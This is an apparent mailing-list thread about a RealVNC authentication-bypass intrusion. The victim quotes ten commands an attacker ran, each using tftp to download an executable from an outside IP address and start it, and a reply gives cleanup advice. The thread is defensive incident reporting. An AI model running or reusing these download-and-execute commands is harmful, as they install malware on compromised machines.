1. Google for the exe files but most likely you will not get much. To
remove them run antivirus package (Antivir is free and good). Before
running it disable system restore in case the files are in windows
directory.
2. Subscribe to vnc-announce-list to which this sort of information is
posted.
here is the link to relevant posting
http://www.realvnc.com/pipermail/vnc-announce/2006.txt
Regards,
Alex
Information Technology Dpt. Crafta wrote:
Hi, I was a victim of the "The vulnerability is caused due to an error
within the handling of VNC password authentication requests."
This is my official note of the case:
http://www.tek-tips.com/viewthread.cfm?qid=1330302&page=1
This is the short explanation of what is that RealVNC vulnerability:
http://secunia.com/advisories/20107/
I have two questions:
1- Someone introduced without password to my realvnc server and executed
these commands:
%comspec% /c tftp -i 69.120.95.217 GET krqqr.exe & start krqqr
%comspec% /c tftp -i 69.120.95.217 GET khtv.exe & start khtv
%comspec% /c tftp -i 83.226.184.184 GET bjgpbrwf.exe & start bjgpbrwf
%comspec% /c tftp -i 83.226.184.184 GET dnyxl.exe & start dnyxl
%comspec% /c tftp -i 83.226.184.184 GET xixy.exe & start xixy
%comspec% /c tftp -i 83.226.184.184 GET cavm.exe & start cavm
%comspec% /c tftp -i 83.226.184.184 GET srsf.exe & start srsf
%comspec% /c tftp -i 83.226.184.184 GET odihiz.exe & start odihiz
%comspec% /c tftp -i 24.205.47.33 GET ltahq.exe & start ltahq
%comspec% /c tftp -i 24.205.47.33 GET jalqi.exe & start jalqi
Does anyone knows what the hack are those?
2.- How can I be notified by email of the RealVNC vulnerabilities in
order do better secure practices?
Thanks in advance
ALDO
_______________________________________________
VNC-List mailing list
[email protected]
To remove yourself from the list visit:
http://www.realvnc.com/mailman/listinfo/vnc-list
_______________________________________________
VNC-List mailing list
[email protected]
To remove yourself from the list visit:
http://www.realvnc.com/mailman/listinfo/vnc-list
